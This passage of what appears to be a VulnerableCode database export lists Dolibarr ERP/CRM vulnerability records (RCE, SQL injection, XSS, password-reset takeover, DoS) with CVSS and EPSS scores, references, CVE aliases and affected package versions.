Dolibarr ERP CRM before 19.0.2 was discovered to contain a remote code execution (RCE) vulnerability via the Computed field parameter under the Users Module Setup function. |
| references |
| 0 |
|
| 1 |
| reference_url |
https://github.com/Dolibarr/dolibarr |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
5.5 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:N |
|
| 1 |
| value |
7.0 |
| scoring_system |
cvssv4 |
| scoring_elements |
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N |
|
| 2 |
| value |
HIGH |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
|
| url |
https://github.com/Dolibarr/dolibarr |
|
| 2 |
| reference_url |
https://github.com/c0d3x27/CVEs/tree/main/CVE-2024-40137 |
| reference_id |
CVE-2024-40137 |
| reference_type |
|
| scores |
| 0 |
| value |
5.5 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:N |
|
| 1 |
| value |
7.0 |
| scoring_system |
cvssv4 |
| scoring_elements |
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N |
|
| 2 |
| value |
HIGH |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
| 3 |
| value |
Track |
| scoring_system |
ssvc |
| scoring_elements |
SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-25T16:09:38Z/ |
|
|
| url |
https://github.com/c0d3x27/CVEs/tree/main/CVE-2024-40137 |
|
| 3 |
|
| 4 |
|
|
| fixed_packages |
|
| aliases |
CVE-2024-40137, GHSA-vprp-94p9-5jp8
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-w7ww-nq62-e7b1 |
|
| 59 |
| url |
VCID-yn53-kazm-1ugc |
| vulnerability_id |
VCID-yn53-kazm-1ugc |
| summary |
An Access Control vulnerability exists in Dolibarr ERP/CRM 13.0.2 (fixed version is 14.0.0) in the forgot-password function because the application allows email addresses as usernames, which can cause a Denial of Service. |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2021-37517 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00356 |
| scoring_system |
epss |
| scoring_elements |
0.58193 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.00356 |
| scoring_system |
epss |
| scoring_elements |
0.58239 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.00356 |
| scoring_system |
epss |
| scoring_elements |
0.5825 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.00356 |
| scoring_system |
epss |
| scoring_elements |
0.58242 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2021-37517 |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@14.0.1 |
| purl |
pkg:composer/dolibarr/dolibarr@14.0.1 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 6 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 7 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 8 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 9 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 10 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 11 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 12 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 13 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 14 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 15 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 16 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 17 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 18 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 19 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 20 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 21 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 22 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 23 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 24 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 25 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 26 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 27 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 28 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 29 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 30 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@14.0.1 |
|
|
| aliases |
CVE-2021-37517, GHSA-xw7v-qrhc-jjg2
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-yn53-kazm-1ugc |
|
| 60 |
| url |
VCID-yumf-hmep-eqd6 |
| vulnerability_id |
VCID-yumf-hmep-eqd6 |
| summary |
Cross-site Scripting
Dolibarr is vulnerable to XSS. |
| references |
| 0 |
|
| 1 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2020-13094 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.01707 |
| scoring_system |
epss |
| scoring_elements |
0.82687 |
| published_at |
2026-06-07T12:55:00Z |
|
| 1 |
| value |
0.01707 |
| scoring_system |
epss |
| scoring_elements |
0.82688 |
| published_at |
2026-06-06T12:55:00Z |
|
| 2 |
| value |
0.01707 |
| scoring_system |
epss |
| scoring_elements |
0.8269 |
| published_at |
2026-06-05T12:55:00Z |
|
| 3 |
| value |
0.01707 |
| scoring_system |
epss |
| scoring_elements |
0.82663 |
| published_at |
2026-06-04T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2020-13094 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
| 6 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@11.0.4 |
| purl |
pkg:composer/dolibarr/dolibarr@11.0.4 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-1xw6-g5jg-9bhq |
|
| 3 |
| vulnerability |
VCID-2avs-48u9-5kgf |
|
| 4 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 5 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 6 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 7 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 8 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 9 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 10 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 11 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 12 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 13 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 14 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 15 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 16 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 17 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 18 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 19 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 20 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 21 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 22 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 23 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 24 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 25 |
| vulnerability |
VCID-m588-hqxv-tkgw |
|
| 26 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 27 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 28 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 29 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 30 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 31 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 32 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 33 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 34 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 35 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 36 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 37 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 38 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 39 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 40 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 41 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@11.0.4 |
|
|
| aliases |
CVE-2020-13094, GHSA-cxvr-r92m-q9hw
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-yumf-hmep-eqd6 |
|
| 61 |
| url |
VCID-yup5-ztvt-cfgp |
| vulnerability_id |
VCID-yup5-ztvt-cfgp |
| summary |
Weak Password Recovery Mechanism for Forgotten Password
Dolibarr is vulnerable to account takeover via the password reset functionality. A low-privileged attacker can reset the password of any user in the application using the password reset link that the user received by email after requesting a reset for a forgotten password. |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2021-25957 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00326 |
| scoring_system |
epss |
| scoring_elements |
0.5586 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.00326 |
| scoring_system |
epss |
| scoring_elements |
0.55909 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.00326 |
| scoring_system |
epss |
| scoring_elements |
0.55922 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.00326 |
| scoring_system |
epss |
| scoring_elements |
0.55916 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2021-25957 |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@13.0.3 |
| purl |
pkg:composer/dolibarr/dolibarr@13.0.3 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 6 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 7 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 8 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 9 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 10 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 11 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 12 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 13 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 14 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 15 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 16 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 17 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 18 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 19 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 20 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 21 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 22 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 23 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 24 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 25 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 26 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 27 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 28 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 29 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 30 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 31 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 32 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 33 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@13.0.3 |
|
| 1 |
| url |
pkg:composer/dolibarr/dolibarr@14.0.0 |
| purl |
pkg:composer/dolibarr/dolibarr@14.0.0 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 6 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 7 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 8 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 9 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 10 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 11 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 12 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 13 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 14 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 15 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 16 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 17 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 18 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 19 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 20 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 21 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 22 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 23 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 24 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 25 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 26 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 27 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 28 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 29 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 30 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 31 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 32 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@14.0.0 |
|
|
| aliases |
CVE-2021-25957, GHSA-c32w-3cqh-f6jx
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-yup5-ztvt-cfgp |
|
| 62 |
| url |
VCID-z1ty-xypd-t3ct |
| vulnerability_id |
VCID-z1ty-xypd-t3ct |
| summary |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Dolibarr is vulnerable to Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'). |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2022-0224 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00515 |
| scoring_system |
epss |
| scoring_elements |
0.67021 |
| published_at |
2026-06-06T12:55:00Z |
|
| 1 |
| value |
0.00515 |
| scoring_system |
epss |
| scoring_elements |
0.67005 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.00515 |
| scoring_system |
epss |
| scoring_elements |
0.66972 |
| published_at |
2026-06-04T12:55:00Z |
|
| 3 |
| value |
0.00515 |
| scoring_system |
epss |
| scoring_elements |
0.67012 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2022-0224 |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@15.0.0 |
| purl |
pkg:composer/dolibarr/dolibarr@15.0.0 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 3 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 4 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 5 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 6 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 7 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 8 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 9 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 10 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 11 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 12 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 13 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 14 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 15 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 16 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 17 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 18 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 19 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 20 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 21 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 22 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 23 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 24 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 25 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@15.0.0 |
|
|
| aliases |
CVE-2022-0224, GHSA-j545-frh3-r9gq
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-z1ty-xypd-t3ct |
|
| 63 |
| url |
VCID-zjqj-1zrx-yqh6 |
| vulnerability_id |
VCID-zjqj-1zrx-yqh6 |
| summary |
Cross-site Scripting
Dolibarr is affected by stored Cross-Site Scripting. |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2017-18259 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00185 |
| scoring_system |
epss |
| scoring_elements |
0.40005 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.00185 |
| scoring_system |
epss |
| scoring_elements |
0.40061 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.00185 |
| scoring_system |
epss |
| scoring_elements |
0.40089 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.00185 |
| scoring_system |
epss |
| scoring_elements |
0.40087 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2017-18259 |
|
| 1 |
|
| 2 |
|
| 3 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@7.0.1 |
| purl |
pkg:composer/dolibarr/dolibarr@7.0.1 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1jh7-xexf-53cw |
|
| 2 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 3 |
| vulnerability |
VCID-2wnq-rrff-tbbt |
|
| 4 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 5 |
| vulnerability |
VCID-3ewz-9zgb-efa7 |
|
| 6 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 7 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 8 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 9 |
| vulnerability |
VCID-62rq-q7na-9kgj |
|
| 10 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 11 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 12 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 13 |
| vulnerability |
VCID-6ten-mcds-gbd7 |
|
| 14 |
| vulnerability |
VCID-79xt-u5af-cqey |
|
| 15 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 16 |
| vulnerability |
VCID-7kz1-s7qf-aqan |
|
| 17 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 18 |
| vulnerability |
VCID-7txt-x88q-2bej |
|
| 19 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 20 |
| vulnerability |
VCID-b65k-vs97-63fj |
|
| 21 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 22 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 23 |
| vulnerability |
VCID-e39t-gvd4-j7ag |
|
| 24 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 25 |
| vulnerability |
VCID-ehb1-ac3n-p7fv |
|
| 26 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 27 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 28 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 29 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 30 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 31 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 32 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 33 |
| vulnerability |
VCID-jy5f-3h8w-qqff |
|
| 34 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 35 |
| vulnerability |
VCID-m9p7-7wnz-7uck |
|
| 36 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 37 |
| vulnerability |
VCID-nmjf-yxwc-m7hj |
|
| 38 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 39 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 40 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 41 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 42 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 43 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 44 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 45 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 46 |
| vulnerability |
VCID-uzz6-3bze-mbez |
|
| 47 |
| vulnerability |
VCID-v5bc-wjmv-ubhx |
|
| 48 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 49 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 50 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 51 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 52 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 53 |
| vulnerability |
VCID-yumf-hmep-eqd6 |
|
| 54 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 55 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@7.0.1 |
|
|
| aliases |
CVE-2017-18259, GHSA-4323-cfj5-98mh
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-zjqj-1zrx-yqh6 |
|